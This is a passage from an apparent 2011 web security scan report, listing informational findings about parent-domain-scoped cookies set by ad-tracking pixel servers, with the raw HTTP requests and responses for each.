YjrmxhQbrCoS7iFCbB+7tiMxgHIHz5FaPoPQqWhJRR+sIvpq5Ll55Fxyatlo+freIBzv2RHZA1tBdmulN2sae9GbmcGlXx3xe/33IaeFVfYOHBeRW3rEwfv6ONyC9L71DsFjvPETn5VslG/EMVOTSJtV7AnFmbd1/SYypacRe2q0WN2DVxEjsOUWUgJWwq1tBa5R58FBT3lEKEHNLCXONkpMeeLi563x87JVybxZmFuI1LkBYkhP7NRUh9Ay+gQG2z7TgVKTQ+EkGag3VVLej1PZQeFaa02o2OYp0+LHfzrtuKzzK9foD+yVFP9qrfM0jxdNNQGAlaiu2XsrjeOWv7/gaLgqkS7CZ8Mor1aOElCyBA9NepnzIg64X8KlLYzvK+fbjSEvoA54hVrO5Z/wxgaX6pEcGhKF1v8in+ZCHhFJlRWCAk+MFfMYupINiCUYqG/7mLgGCayIh53uVOrS9Z9rjs8Gi3qi2OiwZcU3PU90+czFBSlsHfGDvg06AvguK9ylwtrLtSRi4bvVaKLrW2c6ECWnj0RqjuNitWBT0gzplaBA4GX+gyS7IFRn6UTHptksBeGhzqc2RYV7CR9FFPVU3mSbXxqXF8M7UvlV570nu0aItFR31TzICCj3uUkzQFSxjJwdjzr0WXyKRMmsPtUkjwvdahxzMmO01a9VhivaGmAiyM83TMkb3ZQ7LOUbTczgBeKcZzJs+JSbCa9UhNQ//4CmZKNJXDcuyxwa5w3B4Z6PfCrGtZd/igQ+KjFWRq3+PaVYorjiE0VSUClLzVOPhkpelf7stBLXITyHISUjPrPUIqebSnSPma21RKncSMkse4RUP3CF37iCl++s6sVyEptZNXILSK1p6xVnUJ0E0iBNznTpTyi0YIGnKVa9HkmdmZPixX6tLUsDeTPLxqgumAidtD/koUWKxMb1jUfANxs4AuG3H3LI7dOUFbCv+5s/vdW3peWwtTyQXFa5TeeiaphjTTD90EyQ+x4WToyN+PoBEz6ncIX0VOXtw6kc2kPx8wxx6lfVP/emuRGhj8XIHedD0JKErcsNdq1Dn3RcZCb5ovEu996oCmFrxo1lEazyyX1PykBaffKk2c8K1fzZnxKwhQCYjyWRaYJWb28OI92pYFfwv94GS5mwXjVDzK8sQQbzKwQm816oomdIc9JJpTGVyJtaYFwHPbGquw/4hWL/soQtg/Ing9rl33bGkBX616iRhRYUN2+lNnmiGkrLRNII5XCtFVgHcKYbWFxptEDfXHHBTNJnp7l5AQDO7IJWpwl9X7EXD4Q9fNZGTiic8QRol21KVwUtFSux/vSXdKXKSK2Pol7jHlSIFOlrHc4ArqidRM/j/+JfhYeddb+yPh+4mUS70fEVH/LqQgLiizrWOpzfTpV7sHIC/6bHzvizMvADjHpMMho2RCcBTEqQ4hVhdXyA/LyU1WKE8oq5CBvwTf0HxRGIWgEv2B7ncopashBGx6F8RsQAho+Hgnl8BkiYQWkxPz788oa17QhEGUGnDsV7LZ/OQV3yVVi+T2TzhQClq2GsB/LX1Cpnx6vlokdZPKdsCfAVX4MIX4xRoN4qAWw9pRuQEXallzxFIQokhYi+QYVTDvgtF3hEHSRfMZjybyXAhzYl9TWYlEx7MkYiqGlHA/Xz//fF6Rvk8nXWGkhIXzVH3NrONX00BGEK4/KqJwtR8+DTdRzsGcwWT/sTMpx62VMhgFhYGCgaC3u6V6yVMFFLlo8MjEZOenjibKicrItXuhnvpwcClFZS35hgeGfKAg==; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:28:27 GMT; Path=/
X-Proc-ms: 13
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Length: 1687

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['K05540_10572','K05540_10573','K05540_10578','K05540_10276','K05540_10066','K05540_10087','K05540_10174','K05540_10185','K05540_10195','
...[SNIP]...
8.62. http://pixel.mathtag.com/data/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /data/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/img?mt_id=100134&mt_dcid=24&v1=&v2=&v3=&s1=&s2=&s3 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305129714; mt_mop=4:1305207080

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x2 pid 0x6ff 1791
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Thu, 12 May 2011 13:33:53 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1305207233; domain=.mathtag.com; path=/; expires=Fri, 11-May-2012 13:33:53 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
8.63. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=37026276;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fwww.greenfieldreporter.com%26xdm_c%3Ddefault608%26xdm_p%3D1%26;ref=http%3A%2F%2Fwww.greenfieldreporter.com%2Fview%2Fstory%2F0a19804652d4473789a5eda53a1ed37f%2FUS-Investing-Unlucky-Seven%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305207047666;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://segment-pixel.invitemedia.com/pixel?pixelID=23864&partnerID=77&clientID=1679&key=segment&pb=0
Set-Cookie: d=EA0AJe8kjVmM-5GL0ZmY8frRi58oyBABxAEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMWCCUo4TB0_4RDCAMHxCCAg0g4gCdE7tgqRksdDEggguzLBK3HEg_4UxZG1OoHh5pEATSAOiSAMMA7DQNGxCdKTlKOLIw; expires=Wed, 10-Aug-2011 13:31:50 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 13:31:50 GMT
Server: QS

8.64. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-444Ux5EmpXDp6.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-444Ux5EmpXDp6.gif?labels=398.6 HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EGwBOgHcBoHxDhmtEqlQr6INoQyrELEFAwyUAgMOqzAQ

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EA4BOgHdBoGSDhmtEqlQr6INoQyrELEFAwyUAgMOqzAQ; expires=Wed, 10-Aug-2011 13:34:31 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Thu, 12 May 2011 13:34:31 GMT
Server: QS

GIF89a.......,.................D..;
8.65. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-61YFdB4e9hBRs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-61YFdB4e9hBRs.gif?labels=489%2e1340%2e29896%2e300x250&media=apl&idmatch=0 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://tag.admeld.com/match?admeld_adprovider_id=247&external_user_id=xsn5NcbLoWTfyf02y5u1McaarTHfla0xlJoMIo4p
Set-Cookie: d=EI4AJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0eWJUAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA; expires=Wed, 10-Aug-2011 13:30:18 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 13:30:18 GMT
Server: QS

8.66. http://pixel.quantserve.com/seg/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /seg/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/r;a=p-444Ux5EmpXDp6;rand=95187947;redirect=http://aud.pubmatic.com/AdServer/Artemis?dpid=1&segid=!qcsegs HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/dpsync.html?upixid=6&pubid=398&dp=1
Cookie: mc=4d529fca-2c7e4-2f739-1ba49; d=EGwBOgHcBoHxDhmtEqlQr6INoQyrELEFAwyUAgMOqzAQ

Response

HTTP/1.1 302 Found
Connection: close
Location: http://aud.pubmatic.com/AdServer/Artemis?dpid=1&segid=D,T,5802,5798,5789,5785
Set-Cookie: d=EA4BOgHdBoGSDhmtEqlQr6INoQyrELEFAwyUAgMOqzAQ; expires=Wed, 10-Aug-2011 13:34:31 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 13:34:31 GMT
Server: QS

8.67. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=2724386019227846218 HTTP/1.1
Host: r.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/networks-exchanges/overview
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:37 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; expires=Sat, 11-May-2013 13:34:37 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
8.68. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=3482&1=999 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2716&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=isLx4tnkAuIiDQmRHjDSl29yIVHNlRpRhyM6ibTjqZN4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg634vArNzG1QqMSLzk0Y7eRlHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; rrs=1%7C6%7C3%7C4%7C1002%7C6%7C7%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15106%7C15106%7C15104%7C15105%7C15106%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 13:31:36 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:31:36 GMT

GIF89a.............!.......,...........D..;
